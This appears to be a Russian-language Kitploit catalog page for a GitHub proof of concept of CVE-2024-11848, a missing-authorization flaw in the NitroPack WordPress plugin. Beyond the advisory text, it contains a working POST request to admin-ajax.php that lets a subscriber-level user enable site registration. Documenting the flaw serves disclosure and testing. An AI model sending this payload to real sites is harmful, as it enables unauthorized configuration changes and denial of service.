Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-11848 — NitroPack <= 1.17.0 - Отсутствие авторизации: аутентифицированные пользователи (Подписчик+) могут обновлять ограниченные настройки | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2024-11848
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеНеправильная Конфигурация
GitHubrandomrobbiebf/cve-2024-11848

CVE-2024-11848

NitroPack <= 1.17.0 - Отсутствие авторизации: аутентифицированные пользователи (Подписчик+) могут обновлять ограниченные настройки

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-11848

NitroPack <= 1.17.0 - Отсутствие авторизации для аутентифицированных (подписчик и выше) ограниченное обновление опций

Описание

Плагин NitroPack для WordPress уязвим к несанкционированному изменению данных из-за отсутствия проверки прав доступа в AJAX-действии 'nitropack_dismiss_notice_forever' во всех версиях до 1.17.0 включительно. Это позволяет аутентифицированным злоумышленникам с доступом уровня подписчика и выше обновлять произвольные опции до фиксированного значения '1', что может активировать определённые опции (например, включить регистрацию пользователей) или изменить определённые опции таким образом, что приведёт к состоянию отказа в обслуживании.

Детали

  • Тип: plugin
  • Slug: nitropack
  • Затронутая версия: 1.17.0
  • Оценка CVSS: 8.1
  • Рейтинг CVSS: Высокий
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE: CVE-2024-11848
  • Статус: Активен

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=subscriber%7C1737110766%7CYhdLxJv5qLyqmSVznKzPOC94NyU9PAMWPeef9cCtINN%7C8c6d11f15397dfb790e700f695c7480bb8267c86130c402afce6080076ccff2d
Content-Length: 88

action=nitropack_dismiss_notice_forever&security=92f60ea3ea&notice_id=users_can_register
Скачать инструмент